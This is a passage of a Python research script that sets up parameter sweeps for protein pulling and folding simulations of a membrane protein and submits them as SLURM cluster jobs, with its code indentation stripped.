do("pulling_analysis.py -m 8")
cd("../..")
if args.day == "oct04":
if args.mode == 1:
# cd("simulation")
# do("pulling_prepare.py -m 8")
# cd("..")
do("mv freeEnergy old_freeEnergy")
do("mkdir freeEnergy")
cd("freeEnergy")
do("make_metadata.py -m 3 -k 0.02 -t 300")
do("pulling_analysis.py -m 6")
if args.mode == 2:
# cd("simulation")
# do("pulling_prepare.py -m 8")
# cd("..")
fold_list = ["rg_0.4_lipid_2_temp_300_extended", "rg_0.4_lipid_2_temp_300_topology",
"rg_0.4_lipid_2_temp_400_extended", "rg_0.4_lipid_2_temp_400_topology"]
for folder in fold_list:
cd(folder)
name = "qw"
do("mkdir {}".format(name))
cd(name)
do("make_metadata.py -m 3 -k 0.02 -t 300")
do("pulling_analysis.py -m 8")
cd("../..")
if args.day == "oct03":
if args.mode == 1:
print("p3 force ramp")
# start_from_list=["native", "extended", "topology"]
start_from_list=["native"]
# start_from_list=["extended", "topology"]
mode_list = [3] # lipid mediated interaction
# pressure_list = [0, 0.1, 1.0]
pressure_list = [0]
force_ramp_rate_list=[0.5]
temperature_list=[200, 300, 400]
memb_k_list = [1]
rg_list = [0, 0.08, 0.4]
force_list =["ramp"]
repeat = 5
variable_test(temperature_list=temperature_list,
start_from_list=start_from_list,
rg_list=rg_list,
memb_k_list=memb_k_list,
mode_list=mode_list,
pressure_list=pressure_list,
force_ramp_rate_list=force_ramp_rate_list,
force_list=force_list,
repeat=repeat)
if args.mode == 2:
print("p3 folding temperature")
# start_from_list=["native", "extended", "topology"]
start_from_list=["native"]
# start_from_list=["extended", "topology"]
mode_list = [3] # lipid mediated interaction
# pressure_list = [0, 0.1, 1.0]
pressure_list = [0, 2]
force_ramp_rate_list=[0.5]
temperature_list=["ramp"]
memb_k_list = [1, 2, 4]
rg_list = [0, 0.08, 0.4]
force_list =["ramp"]
repeat = 2
variable_test(temperature_list=temperature_list,
start_from_list=start_from_list,
rg_list=rg_list,
memb_k_list=memb_k_list,
mode_list=mode_list,
pressure_list=pressure_list,
force_ramp_rate_list=force_ramp_rate_list,
force_list=force_list,
repeat=repeat)
if args.day == "sep26":
if args.mode == 1:
print("constant force")
# start_from_list=["native", "extended", "topology"]
start_from_list=["native"]
# start_from_list=["extended", "topology"]
mode_list = [3] # lipid mediated interaction
# pressure_list = [0, 0.1, 1.0]
pressure_list = [0]
force_ramp_rate_list=[0.5]
temperature_list=[200, 300, 400]
memb_k_list = [1]
rg_list = [0, 0.08, 0.4]
force_list =[0.1, 0.2, 0.25, 0.3, 0.4]
repeat = 5
variable_test(temperature_list=temperature_list,
start_from_list=start_from_list,
rg_list=rg_list,
memb_k_list=memb_k_list,
mode_list=mode_list,
pressure_list=pressure_list,
force_ramp_rate_list=force_ramp_rate_list,
force_list=force_list,
repeat=repeat)
if args.day == "sep25":
if args.mode == 5:
print("constant force")
# start_from_list=["native", "extended", "topology"]
start_from_list=["native"]
# start_from_list=["extended", "topology"]
mode_list = [3] # lipid mediated interaction
# pressure_list = [0, 0.1, 1.0]
pressure_list = [2]
force_ramp_rate_list=[0.5]
temperature_list=[300]
memb_k_list = [1]
rg_list = [0.4]
force_list =[0.6, 0.7, 0.75, 0.8, 0.85]
repeat = 20
variable_test(temperature_list=temperature_list,
start_from_list=start_from_list,
rg_list=rg_list,
memb_k_list=memb_k_list,
mode_list=mode_list,
pressure_list=pressure_list,
force_ramp_rate_list=force_ramp_rate_list,
force_list=force_list,
repeat=repeat)
if args.mode == 4:
print("start with basic")
# start_from_list=["native", "extended", "topology"]
# start_from_list=["native"]
start_from_list=["extended", "topology"]
mode_list = [3] # lipid mediated interaction
# pressure_list = [0, 0.1, 1.0]
pressure_list = [2]
force_ramp_rate_list=[0.5]
temperature_list=[300]
memb_k_list = [1]
rg_list = [0.4]
force_list =[0.0, 0.1, 0.2, 0.3]
repeat = 50
variable_test(temperature_list=temperature_list,
start_from_list=start_from_list,
rg_list=rg_list,
memb_k_list=memb_k_list,
mode_list=mode_list,
pressure_list=pressure_list,
force_ramp_rate_list=force_ramp_rate_list,
force_list=force_list,
repeat=repeat)
if args.mode == 3:
print("start with basic")
# start_from_list=["native", "extended", "topology"]
start_from_list=["native"]
mode_list = [3] # lipid mediated interaction
# pressure_list = [0, 0.1, 1.0]
pressure_list = [0]
force_ramp_rate_list=[1]
temperature_list=[200, 300]
memb_k_list = [1]
rg_list = [0.08]
repeat = 5
variable_test(temperature_list=temperature_list,
start_from_list=start_from_list,
rg_list=rg_list,
memb_k_list=memb_k_list,
mode_list=mode_list,
pressure_list=pressure_list,
force_ramp_rate_list=force_ramp_rate_list,
repeat=repeat)
if args.mode == 2:
print("Force ramp with high rg")
# start_from_list=["native", "extended", "topology"]
start_from_list=["native"]
mode_list = [3] # lipid mediated interaction
# pressure_list = [0, 0.1, 1.0]
pressure_list = [0, 1, 2, 3]
force_ramp_rate_list=[1]
temperature_list=[300]
memb_k_list = [1, 2]
rg_list = [0, 0.2, 0.4, 0.8, 1.6]
repeat = 3
variable_test(temperature_list=temperature_list,
start_from_list=start_from_list,
rg_list=rg_list,
memb_k_list=memb_k_list,
mode_list=mode_list,
pressure_list=pressure_list,
force_ramp_rate_list=force_ramp_rate_list,
repeat=repeat)
if args.mode == 1:
print("Force ramp without go")
# start_from_list=["native", "extended", "topology"]
start_from_list=["native"]
mode_list = [3] # lipid mediated interaction
# pressure_list = [0, 0.1, 1.0]
pressure_list = [0, 1, 2, 3]
force_ramp_rate_list=[1]
temperature_list=[300]
memb_k_list = [0, 1, 2, 4]
rg_list = [0, 0.08, 0.2, 0.4, 1, 2]
repeat = 3
variable_test(temperature_list=temperature_list,
start_from_list=start_from_list,
rg_list=rg_list,
memb_k_list=memb_k_list,
mode_list=mode_list,
pressure_list=pressure_list,
force_ramp_rate_list=force_ramp_rate_list,
repeat=repeat)
if args.day == "sep24":
if args.mode == 1:
# start_from_list=["native", "extended", "topology"]
start_from_list=["native"]
mode_list = [3]
# pressure_list = [0, 0.1, 1.0]
pressure_list = [0, 1, 2, 3]
force_ramp_rate_list=[1]
temperature_list=[200, 300]
memb_k_list = [1, 2, 4]
rg_list = [0, 0.02, 0.08, 0.2]
repeat = 3
variable_test(temperature_list=temperature_list,
start_from_list=start_from_list,
rg_list=rg_list,
memb_k_list=memb_k_list,
mode_list=mode_list,
pressure_list=pressure_list,
force_ramp_rate_list=force_ramp_rate_list,
repeat=repeat)
if args.day == "sep23":
if args.mode == 1:
# start_from_list=["native", "extended", "topology"]
start_from_list=["native"]
mode_list = [3]
# pressure_list = [0, 0.1, 1.0]
pressure_list = [0, 2, 4, 6, 8]
force_ramp_rate_list=[1]
temperature_list=[200, 300, 400]
memb_k_list = [1, 2, 4, 8, 16]
repeat = 5
variable_test(temperature_list=temperature_list,
start_from_list=start_from_list,
memb_k_list=memb_k_list,
mode_list=mode_list,
pressure_list=pressure_list,
force_ramp_rate_list=force_ramp_rate_list,
repeat=repeat)
if args.day == "sep20":
if args.mode == 3:
# start_from_list=["native", "extended", "topology"]
start_from_list=["native"]
mode_list = [3]
# pressure_list = [0, 0.1, 1.0]
pressure_list = [0, 0.1, 1, 2, 4]
force_ramp_rate_list=[1]
temperature_list=[300]
memb_k_list = [1, 2, 4, 8, 16]
repeat = 5
variable_test(temperature_list=temperature_list,
start_from_list=start_from_list,
memb_k_list=memb_k_list,
mode_list=mode_list,
pressure_list=pressure_list,
force_ramp_rate_list=force_ramp_rate_list,
repeat=repeat)
if args.mode == 1:
# start_from_list=["native", "extended", "topology"]
start_from_list=["native"]
mode_list = [3]
# pressure_list = [0, 0.1, 1.0]
pressure_list = [0]
force_ramp_rate_list=[10]
temperature_list=["ramp"]
memb_k_list = [1, 2, 4, 8, 16]
repeat = 2
variable_test(temperature_list=temperature_list,
start_from_list=start_from_list,
memb_k_list=memb_k_list,
mode_list=mode_list,
pressure_list=pressure_list,
force_ramp_rate_list=force_ramp_rate_list,
repeat=repeat)
if args.mode == 2:
# start_from_list=["native", "extended", "topology"]
start_from_list=["native"]
mode_list = [3]
# pressure_list = [0, 0.1, 1.0]
pressure_list = [0]
force_ramp_rate_list=[10]
temperature_list=["ramp"]
repeat = 5
variable_test(temperature_list=temperature_list,
start_from_list=start_from_list,
mode_list=mode_list,
pressure_list=pressure_list,
force_ramp_rate_list=force_ramp_rate_list,
repeat=repeat)
if args.day == "sep17":
if args.mode == 1:
# start_from_list=["native", "extended", "topology"]
start_from_list=["native"]
mode_list = [3]
# pressure_list = [0, 0.1, 1.0]
pressure_list = [0, 0.1, 1, 2, 4]
force_ramp_rate_list=[1, 10]
temperature_list=[230, 300]
repeat = 5
variable_test(temperature_list=temperature_list,
start_from_list=start_from_list,
mode_list=mode_list,
pressure_list=pressure_list,
force_ramp_rate_list=force_ramp_rate_list,
repeat=repeat)
if args.day == "sep11":
if args.mode == 1:
# folding tempearture
pressure_list = [0.1]
rg_list = [0.08]
force_list =["ramp"]
temperature_list=[230, 300]
memb_k_list=[1]
# start_from_list=["extended", "topology"]
start_from_list=["native"]
simulation_model_list=["go"]
force_ramp_rate_list=[1]
variable_test(temperature_list=temperature_list,
memb_k_list=memb_k_list,
rg_list=rg_list,
simulation_model_list=simulation_model_list,
start_from_list=start_from_list,
force_list=force_list,
pressure_list=pressure_list,
repeat=100,force_ramp_rate_list=force_ramp_rate_list)
if args.day == "sep10":
if args.mode == 1:
# folding tempearture
pressure_list = [0.4, 0.8]
rg_list = [0.4]
force_list =[0.3, 0.35, 0.4]
temperature_list=[230, 300]
memb_k_list=[1, 4]
# start_from_list=["extended", "topology"]
start_from_list=["native"]
simulation_model_list=["go"]
force_ramp_rate_list=[2]
variable_test(temperature_list=temperature_list,
memb_k_list=memb_k_list,
rg_list=rg_list,
simulation_model_list=simulation_model_list,
start_from_list=start_from_list,
force_list=force_list,
pressure_list=pressure_list,
repeat=10,force_ramp_rate_list=force_ramp_rate_list)
if args.mode == 2:
# folding tempearture
pressure_list = [0.1]
rg_list = [0.08, 0.2]
memb_k_list=[1, 2, 4]
force_list =[0.01, 0.02, 0.04, 0.08]
temperature_list=[230, 300]
start_from_list=["extended", "topology"]
# start_from_list=["native"]
simulation_model_list=["go"]
force_ramp_rate_list=[2]
variable_test(temperature_list=temperature_list,
memb_k_list=memb_k_list,
rg_list=rg_list,
simulation_model_list=simulation_model_list,
start_from_list=start_from_list,
force_list=force_list,
pressure_list=pressure_list,
repeat=4, force_ramp_rate_list=force_ramp_rate_list)
if args.mode == 3:
# folding tempearture
pressure_list = [0.1]
rg_list = [0.08]
memb_k_list=[1]
force_list =[0.2, 0.3, 0.35, 0.4]
temperature_list=[230]
# start_from_list=["extended", "topology"]
start_from_list=["native"]
simulation_model_list=["go"]
force_ramp_rate_list=[2]
variable_test(temperature_list=temperature_list,
memb_k_list=memb_k_list,
rg_list=rg_list,
simulation_model_list=simulation_model_list,
start_from_list=start_from_list,
force_list=force_list,
pressure_list=pressure_list,
repeat=20, force_ramp_rate_list=force_ramp_rate_list)
if args.mode == 4: # pending
# folding tempearture
pressure_list = [0.1]
rg_list = [0.08]
memb_k_list=[1, 2, 4]
force_list =[0.2, 0.3, 0.35, 0.4]
temperature_list=[230, 300]
# start_from_list=["extended", "topology"]
start_from_list=["native"]
simulation_model_list=["go"]
force_ramp_rate_list=[2]
variable_test(temperature_list=temperature_list,
memb_k_list=memb_k_list,
rg_list=rg_list,
simulation_model_list=simulation_model_list,
start_from_list=start_from_list,
force_list=force_list,
pressure_list=pressure_list,
repeat=10, force_ramp_rate_list=force_ramp_rate_list)
if args.day == "sep09":
if args.mode == 1:
cd("simulation")
do("pulling_prepare.py -m 7")
cd("..")
do("mkdir freeEnergy")
cd("freeEnergy")
do("make_metadata.py -m 3 -k 0.02 -t 230")
do("pulling_analysis.py -m 6")
if args.mode == 2:
cmd = "gg.py -m 8"
run_slurm = base_slurm.format(cmd)
# folder_list = glob.glob("force_*")
# folder_list = ['force_0.08', 'force_0.03', 'force_0.0']
folder_list = ['force_0.055']
# folder_list = ['force_0.07', 'force_0.02', 'force_0.045']
# folder_list = ['force_0.06', 'force_0.04']
print(folder_list)
for folder in folder_list:
cd(folder)
cd("simulation")
run_list = glob.glob("*")
for run in run_list:
cd(run)
cd("0")
with open("compute_angle.slurm", "w") as r:
r.write(run_slurm)
do("sbatch compute_angle.slurm")
cd("../..")
cd("../..")
if args.mode == 3:
# folding tempearture
pressure_list = [0.0, 0.1, 0.2]
force_list =[0.0]
rg_list = [0, 0.08, 0.1, 0.2]
temperature_list=["ramp"]
# start_from_list=["extended", "topology"]
start_from_list=["native"]
simulation_model_list=["go", "single"]
variable_test(temperature_list=temperature_list,
simulation_model_list=simulation_model_list,
rg_list=rg_list,
start_from_list=start_from_list,
force_list=force_list,
pressure_list=pressure_list,
repeat=3,force_ramp_rate_list=[10, 1])
if args.mode == 4:
# folding tempearture
pressure_list = [0, 0.1, 0.2]
rg_list = [0, 0.08, 0.1, 0.2]
force_list =[0.0]
temperature_list=[230]
# start_from_list=["extended", "topology"]
start_from_list=["native"]
simulation_model_list=["go", "single"]
force_ramp_rate_list=[1, 10]
variable_test(temperature_list=temperature_list,
rg_list=rg_list,
simulation_model_list=simulation_model_list,
start_from_list=start_from_list,
force_list=force_list,
pressure_list=pressure_list,
repeat=5,force_ramp_rate_list=force_ramp_rate_list)
if(args.mode == 5):
print("Extract qw and distance info.")
for i in range(100):
cd(str(i))
cd("0")
do("awk '{print $2}' wham.dat | sed 's/,$//' | sed 1d > qw.dat")
do("awk '{print $2}' addforce.dat | sed 's/,$//' | sed 1d > distance.dat")
cd("../..")
print("create directory_list")
with open("directory_list", "w") as f:
for i in range(40):
# print(os.getcwd())
location = os.getcwd() + "/../"
f.write(location+str(i)+"/0\n")
do("cp ../../2xov/2xov.pdb .")
do("python2 ~/opt/small_script/CalcLocalDistanceStats.py 2xov directory_list out")
if args.mode == 6:
# folding tempearture
pressure_list = [0.1]
rg_list = [0.1]
memb_k_list=[1, 4]
force_list =[0.1, 0.15, 0.05]
temperature_list=[230, 300]
start_from_list=["extended", "topology"]
# start_from_list=["native"]
simulation_model_list=["go", "single"]
force_ramp_rate_list=[10]
variable_test(temperature_list=temperature_list,
memb_k_list=memb_k_list,
rg_list=rg_list,
simulation_model_list=simulation_model_list,
start_from_list=start_from_list,
force_list=force_list,
pressure_list=pressure_list,
repeat=7,force_ramp_rate_list=force_ramp_rate_list)
if args.mode == 7:
# folding tempearture
pressure_list = [0.4]
rg_list = [0.4]
memb_k_list=[4]
force_list =[0.0]
temperature_list=[230]
# start_from_list=["extended", "topology"]
start_from_list=["native"]
simulation_model_list=["go", "single"]
force_ramp_rate_list=[1]
variable_test(temperature_list=temperature_list,
memb_k_list=memb_k_list,
rg_list=rg_list,
simulation_model_list=simulation_model_list,
start_from_list=start_from_list,
force_list=force_list,
pressure_list=pressure_list,
repeat=20,force_ramp_rate_list=force_ramp_rate_list)
if args.mode == 8:
# folding tempearture
pressure_list = [0.4]
rg_list = [0.4]
memb_k_list=[4]
force_list =[0.1, 0.15, 0.05]
temperature_list=[230, 300]
start_from_list=["extended", "topology"]
# start_from_list=["native"]
simulation_model_list=["go", "single"]
force_ramp_rate_list=[2]
variable_test(temperature_list=temperature_list,
memb_k_list=memb_k_list,
rg_list=rg_list,
simulation_model_list=simulation_model_list,
start_from_list=start_from_list,
force_list=force_list,
pressure_list=pressure_list,
repeat=6,force_ramp_rate_list=force_ramp_rate_list)
if args.day == "sep08":
if args.mode == 1:
pressure_list = [0.1, 0.2, 0.4]
force_list =[0.01, 0.02, 0.04, 0.08]
temperature_list=[230]
start_from_list=["extended", "topology"]
variable_test(temperature_list=temperature_list,
start_from_list=start_from_list,
force_list=force_list,
pressure_list=pressure_list,
repeat=20,force_ramp_rate_list=[1])
if args.mode == 2:
pressure_list = [0.1]
force_list =[0.01, 0.02]
temperature_list=[230, 240]
# start_from_list=["extended", "topology"]
start_from_list=["extended"]
variable_test(temperature_list=temperature_list,
start_from_list=start_from_list,
force_list=force_list,
pressure_list=pressure_list,
repeat=50,force_ramp_rate_list=[0.5])
if args.mode == 3:
# folding tempearture
pressure_list = [0.1, 0.2]
force_list =[0.0]
temperature_list=["ramp"]
# start_from_list=["extended", "topology"]
start_from_list=["native"]
simulation_model_list=["go", "single"]
variable_test(temperature_list=temperature_list,
simulation_model_list=simulation_model_list,
start_from_list=start_from_list,
force_list=force_list,
pressure_list=pressure_list,
repeat=5,force_ramp_rate_list=[10])
if args.mode == 4:
# folding tempearture
pressure_list = [0.1, 0.2]
force_list =[0.0]
temperature_list=[200]
# start_from_list=["extended", "topology"]
start_from_list=["native"]
simulation_model_list=["go", "single"]
force_ramp_rate_list=[1, 10]
variable_test(temperature_list=temperature_list,
simulation_model_list=simulation_model_list,
start_from_list=start_from_list,
force_list=force_list,
pressure_list=pressure_list,
repeat=20,force_ramp_rate_list=force_ramp_rate_list)
if args.day == "sep07":
if args.mode == 9:
# simulation_model_list=["go", "single"]
force_list =[0.55, 0.5, 0.56, 0.57, 0.58, 0.59]
variable_test(force_list=force_list, repeat=20)
if args.mode == 8:
# simulation_model_list=["go", "single"]
# force_list =[0.6, 0.5, 0.4]
# memb_k_list = [1, 2, 4]
pressure_list = [0.1, 0.2, 0.4]
# pressure_list = [0.8, 1.6]
rg_list = [0.08, 0.04, 0.02]
k_list = [0.1, 0.2, 0.3, 0.4]
variable_test(k_list=k_list, pressure_list=pressure_list,
force_ramp_rate_list=[10], rg_list=rg_list, repeat=3)
if args.mode == 7:
cd("simulation")
do("pulling_prepare.py -m 7")
cd("..")
do("mkdir freeEnergy")
cd("freeEnergy")
do("make_metadata.py -m 3 -k 0.02 -t 230")
do("pulling_analysis.py -m 6")
if args.mode == 1:
memb_k_list = [1, 2, 4, 8, 16]
variable_test(memb_k_list=memb_k_list, repeat=5)
if args.mode == 2:
force_ramp_rate_list = [1, 2, 4, 8, 16, 32]
variable_test(force_ramp_rate_list=force_ramp_rate_list, repeat=5)
if args.mode == 3:
force_ramp_rate_list = [1, 2, 4, 8, 16, 32]
variable_test(temperature_list=[200], force_ramp_rate_list=force_ramp_rate_list, repeat=5)
if args.mode == 4:
# simulation_model_list=["go", "single"]
# force_list =[0.6, 0.5, 0.4]
force_list =[0.8, 0.6, 0.4]
memb_k_list = [1, 2, 4]
variable_test(memb_k_list=memb_k_list, force_list=force_list, repeat=5)
if args.mode == 6:
# simulation_model_list=["go", "single"]
# force_list =[0.6, 0.5, 0.4]
force_list =[0.3]
memb_k_list = [1, 2, 4]
# pressure_list = [0.1, 0.2, 0.4]
pressure_list = [0.8, 1.6]
k_list = [10, 11, 12, 13]
variable_test(k_list=k_list, pressure_list=pressure_list,
force_ramp_rate_list=[10], memb_k_list=memb_k_list, force_list=force_list, repeat=3)
if args.day == "sep06":
if args.mode == 1:
start_from_list=["extended", "topology"]
simulation_model_list=["go", "single"]
temperature_list = [200, 250, 300]
pressure_list = [0, 0.1, 0.5, 1]
variable_test(pressure_list=pressure_list,
start_from_list=start_from_list,
simulation_model_list=simulation_model_list,
repeat=5,
temperature_list=temperature_list,
commons=0)
if args.mode == 2:
start_from_list=["extended", "topology"]
simulation_model_list=["go", "single"]
temperature_list = [250, 300]
memb_k_list = [0, 1, 2, 4]
rg_list = [0, 0.1]
variable_test(rg_list=rg_list, memb_k_list=memb_k_list,
start_from_list=start_from_list,
simulation_model_list=simulation_model_list,
repeat=3,
temperature_list=temperature_list,
commons=0)
if args.mode == 20:
rg_list = [0]
temperature_list = [200]
variable_test(rg_list=rg_list, repeat=40, temperature_list=temperature_list, commons=True)
if args.mode == 19:
rg_list = [0]
temperature_list = [175, 200, 225, 250]
variable_test(rg_list=rg_list, repeat=20, temperature_list=temperature_list, commons=True)
if args.mode == 18:
rg_list = [0, 0.1, 0.2, 1]
memb_k_list = [0, 1, 2, 4]
pressure_list = [0, 0.1, 0.2, 0.4, 0.8, 1, 2]
# rg_list = [0.1]
# memb_k_list = [1]
# pressure_list = [0.1, 1]
variable_test(rg_list=rg_list, memb_k_list=memb_k_list, pressure_list=pressure_list, repeat=2)
if args.mode == 17:
# protocol_list = ["er", "awsemer", "frag", "raptor"]
protocol_list = ["awsemer", "frag"]
protein_list = ["1occ"]
for protein in protein_list:
for protocol in protocol_list:
print("Work on protein: {}, protocol: {}".format(protein, protocol))
if protocol == "raptor":
do("cp ~/opt/gremlin/protein/1occ/raptor/go_rnativeC* {}/".format(protein))
else:
do("cp ~/opt/gremlin/protein/1occ/gremlin/go_rnativeC* {}/".format(protein))
do("mkdir -p {}".format(protocol))
do("cp -r {} {}/".format(protein, protocol))
cd(protocol)
cd(protein)
fileName = "{}_multi.in".format(protein)
if protocol == "raptor":
backbone_file = "fix_backbone_coeff_er.data"
do("cp ~/opt/gremlin/protein/{}/raptor/go_rnativeC* .".format(protein))
else:
backbone_file = "fix_backbone_coeff_{}.data".format(protocol)
do("cp ~/opt/gremlin/protein/{}/gremlin/go_rnativeC* .".format(protein))
with fileinput.FileInput(fileName, inplace=True, backup='.bak') as file:
for line in file:
tmp = line
tmp = tmp.replace("fix_backbone_coeff_er.data", backbone_file)
print(tmp, end='')
cd("..")
do("run.py -m 0 -n 20 {}".format(protein))
cd("..")
if args.mode == 16:
rg_list = [0, 0.1, 0.2, 0.4, 0.5, 1, 2, 4]
variable_test(rg_list=rg_list, repeat=1, commons=True)
if(args.mode == 15):
print("create directory_list")
with open("directory_list", "w") as f:
for i in range(40):
# print(os.getcwd())
location = os.getcwd() + "/../"
f.write(location+str(i)+"/0\n")
do("cp ../../2xov/2xov.pdb .")
do("python2 ~/opt/small_script/CalcLocalDistanceStats.py 2xov directory_list out")
if(args.mode == 14):
print("Extract qw and distance info.")
for i in range(100):
cd(str(i))
cd("0")
do("awk '{print $2}' wham.dat | sed 's/,$//' | sed 1d > qw.dat")
do("awk '{print $2}' addforce.dat | sed 's/,$//' | sed 1d > distance.dat")
cd("../..")
if args.mode == 13:
rg_list = [0, 0.1, 0.2, 0.4, 0.8, 1.6, 3.2]
memb_k_list = [0, 1, 2, 4, 8]
variable_test(rg_list=rg_list, memb_k_list=memb_k_list)
if args.mode == 12:
rg_list = [0.1, 0.2, 0.4, 0.8, 1.6, 3.2]
variable_test(rg_list=rg_list)
if args.mode == 11:
zim_type_list = ["aug04", "aug26"]
membrane_width_list = [30, 28.8]
for zim in zim_type_list:
for width in membrane_width_list:
folder = "zim_{}_width_{}".format(zim, width)
do("mkdir -p {}".format(folder))
cd(folder)
do("cp -r ../2xov .")
cd("2xov")
fixFile = "fix_backbone_coeff_single.data"
with fileinput.FileInput(fixFile, inplace=True, backup='.bak') as file:
for line in file:
print(line.replace("WIDTH", str(width)), end='')
do("cp zim_{} zim".format(zim))
cd("..")
do("run.py -n 2 2xov")
cd("..")
if args.mode == 10:
distance_list = np.linspace(166, 180, 15)
for distance in distance_list:
folder = "dis_{}".format(distance)
cd(folder)
do("sbatch run_0.slurm")
cd("..")
# if args.mode == 9:
# cmd = "python3 ~/opt/small_script/find_distance.py"
# run_slurm = base_slurm.format(cmd)
# folder_list = ['force_0.045']
# print(folder_list)
# for folder in folder_list:
# cd(folder)
# cd("simulation")
# run_list = glob.glob("*")
# for run in run_list:
# cd(run)
# cd("0")
# with open("find_distance.slurm", "w") as r:
# r.write(run_slurm)
# do("sbatch find_distance.slurm")
# cd("../..")
# cd("../..")
#
# if args.mode == 8:
# cmd = "gg.py -m 8"
# run_slurm = base_slurm.format(cmd)
#
# # folder_list = glob.glob("force_*")
# # folder_list = ['force_0.08', 'force_0.03', 'force_0.0']
# folder_list = ['force_0.055']
# # folder_list = ['force_0.07', 'force_0.02', 'force_0.045']
# # folder_list = ['force_0.06', 'force_0.04']
# print(folder_list)
# for folder in folder_list:
# cd(folder)
# cd("simulation")
# run_list = glob.glob("*")
# for run in run_list:
# cd(run)
# cd("0")
# with open("compute_angle.slurm", "w") as r:
# r.write(run_slurm)
# do("sbatch compute_angle.slurm")
# cd("../..")
# cd("../..")
# if args.mode == 7:
# for i in range(80):
# do("mv {0} ../../../new_force_ramp/memb_0_force_ramp_rg_0_new/simulation/{1}".format(i,i+90))
# if args.mode == 6:
# force_list = [0.55, 0.6, 0.65]
# # force_list = [0.25, 0.35, 0.4, 0.45]
# # force_list = [0.15, 0.2]
# for force in force_list:
# do("mkdir force_{}".format(force))
# do("cp -r 2xov force_{}/".format(force))
# cd("force_{}".format(force))
# with fileinput.FileInput("2xov/2xov_multi.in", inplace=True, backup='.bak') as file:
# for line in file:
# print(line.replace("MY_FORCE", str(force)), end='')
# do("run.py -n 10 2xov/")
# cd("..")
#
#
# if args.mode == 5:
# # cd("start_misfolded")
# distance_list = np.linspace(0, 30, 16)
# for dis in distance_list:
# do("mkdir -p dis_{}".format(dis))
# do("cp -r ../2xov/ dis_{}".format(dis))
# do("cp ../../freeEnergy/go_model_start_unfolded/simulation/dis_{0}/restart.25000000 dis_{0}/2xov/".format(dis))
# cd("dis_{}".format(dis))
# do("run.py -n 10 2xov/")
# cd("..")
# if args.mode == 4:
# do("rm data")
# for i in range(100):
# do("cat dis_{}/0/data >> data.dat".format(i))
# do("awk '{print $1}' data.dat > e.dat")
# do("awk '{print $2}' data.dat > p.dat")
# do("awk '{print $3}' data.dat > qw.dat")
#
# if args.mode == 1:
# cd("simulation")
# do("pulling_prepare.py")
# cd("..")
# do("mkdir freeEnergy")
# cd("freeEnergy")
# do("make_metadata.py -k 0.05 -t 300")
# do("pulling_analysis.py -m 3 -p 2")
#
# if args.mode == 2:
# print("80 bins.")
# # cd("simulation")
# # do("pulling_prepare.py")
# # cd("..")
# do("mkdir more_bin")
# cd("more_bin")
# do("make_metadata.py -k 0.05 -t 600")
# do("pulling_analysis.py -m 3 -p 1")
#
# if args.mode == 3:
# # cd("simulation")
# # do("pulling_prepare.py")
# # cd("..")
# do("mkdir -p only_less_than_100")
# cd("only_less_than_100")
# do("make_metadata.py -k 0.05 -t 300 -m 2")
# do("pulling_analysis.py -m 3 -p 1")
# # for i in range(52, 70):
# # do("mv {}/{} .".format(i, i-40))
# # do("mv {} {}".format(i, i-20))
# # for i in range(50):
# # do("mv force_0.8_2/{} force_0.8/{}".format(i, i+50))
# # do("mv half_contact_force_0.8_memb1_rg1_2/{} half_contact_force_0.8_memb1_rg1/{}".format(i, i+20))
#
if(args.run):
print("Hello World")
name = "T0833"
n = 21
do("mkdir "+name)
cd(name)
for i in range(1, n):
do("mkdir -p job.{}".format(i))
do("cp ../preparation_files/myjob_nots.slurm job.{}".format(i))
do("cp ../preparation_files/loopsubmit.bash job.{}".format(i))
do("cp -r ../preparation_files/{0}_runpackage job.{1}/runpackage".format(name, i))
do("cp ../preparation_files/{1}_tpr/run.{0}.tpr job.{0}/runpackage/run.tpr".format(i, name))
for i in range(1, n):
cd("job.{}".format(i))
fileName = "myjob_nots.slurm"
with fileinput.FileInput(fileName, inplace=True, backup='.bak') as file:
for line in file:
print(line.replace("T0766", name), end='')
do("bash loopsubmit.bash")
cd("..")
# for i in range(1, 6):
# do("mkdir job.{}".format(i))
# do("cp myjob_nots.slurm job.{}".format(i))
# do("cp loopsubmit.bash job.{}".format(i))
# do("cp -r runpackage job.{}".format(i))
# do("cp run.{0}.tpr job.{0}/runpackage/run.tpr".format(i))
# for i in range(1, 6):
# cd("job.{}".format(i))
# fileName = "myjob_nots.slurm"
# name = "T0833"
# with fileinput.FileInput(fileName, inplace=True, backup='.bak') as file:
# for line in file:
# print(line.replace("T0766", name), end='')
# do("bash loopsubmit.bash")
# cd("..")
# force_list = [0.3, 0.5, 0.7, 0.9, 1.1, 1.3]
# for force in force_list:
# folder = "1d_force_" + str(force)
# do("mkdir -p " + folder)
# cd(folder)
# do("cp ../metadatafile .")
# do("~/bin/python3/bin/python3 ~/opt/pulling_analysis.py -f -m 5 --force {}".format(force))
# do("sbatch freeEnergy.slurm")
# cd("..")
# do("rm -r test")
# do("cp -r 2xov test")
# cd("test")
# do("test_run.py test.in")
if(args.see):
do("head test/0/addforce.dat")
def fix_error_run():
n = args.number
for i in range(n):
os.chdir(str(i))
os.system("cp ~/opt/pulling/qnqc.slurm .")
os.system("sbatch qnqc.slurm")
os.chdir("..")
# os.system("grep 'srun: error: Application launch failed: Socket timed out on send/recv operation' . -r | cut -d':' -f1 | rev | cut -d"/" -f2- | rev > list")
# array = []
# cwd = os.getcwd()
# print(cwd)
# with open('list', 'r') as ins:
# for line in ins:
# target = line.strip('\n')
# array.append(target)
# for i in array:
# os.chdir(i)
# os.system("rm slurm-*")
# os.system("sbatch rerun.slurm")
# sleep(0.5) # Time in seconds.
# os.system("sbatch qnqc.slurm")
# sleep(0.5) # Time in seconds.
# # os.system("pwd")
# os.chdir(cwd)
# os.system("cut -d'/' -f2 list >")
# if(args.fix):
# fix_error_run()
def rerun():
n = args.number
for i in range(n):
os.system("cp -r {0} rerun_{0}".format(str(i)))
# source = "~/opt/gagb/gagb_constant200_rerun.in"
# target = " 2lhc.in"
source = "~/opt/pulling/2xov_force_load_dis.in"
target = " 2xov.in"
os.system("cp "+source + target)
os.system("cp "+target+" rerun_{}/".format(str(i)))
os.chdir("rerun_"+str(i))
os.system("rm slurm*")
os.system("sbatch run.slurm")
os.chdir("..")
# if(args.rerun):
# rerun()
def continue_run():
n = 10
os.chdir("simulation")
for i in range(n):
os.system("cp -r {0} continue_{0}".format(str(i)))
# source = "~/opt/gagb/gagb_constant200_rerun.in"
# target = " 2lhc.in"
source = "~/opt/pulling/2xov_continue_run.in"
target = " 2xov.in"
os.system("cp "+source + target)
os.system("cp "+target+" continue_{}/".format(str(i)))
os.chdir("continue_"+str(i))
os.system("rm slurm*")
os.system( # replace RANDOM with a radnom number
"sed -i.bak 's/RANDOM/'" +
